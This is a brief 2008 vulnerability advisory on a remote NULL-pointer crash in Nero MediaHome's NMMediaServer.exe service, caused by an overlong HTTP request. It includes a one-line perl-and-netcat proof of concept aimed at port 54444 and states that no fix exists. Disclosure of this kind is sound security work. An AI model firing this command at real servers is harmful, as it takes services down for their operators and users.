#######################################################################

                             Luigi Auriemma

Application:  Nero
              http://www.nero.com
Versions:     <= 8.3.2.1
              (Nero MediaHome <= 3.3.3.0)
Platforms:    Windows
Bug:          NULL pointer in Nero MediaHome
Exploitation: remote
Date:         12 Apr 2008
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bug
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


Nero MediaHome is a media server which is part of the Nero suite.


#######################################################################

======
2) Bug
======


The NMMediaServer.exe service is vulnerable to a crash caused by a NULL
pointer vulnerability exploitable through the sending of a HTTP request
longer than 3076 bytes (a minimum of 4 bytes plus the limit of 3072
bytes used by the program).


#######################################################################

===========
3) The Code
===========


perl -e 'print "a"x3077' | nc SERVER 54444 -v -v


#######################################################################

======
4) Fix
======


No fix


#######################################################################
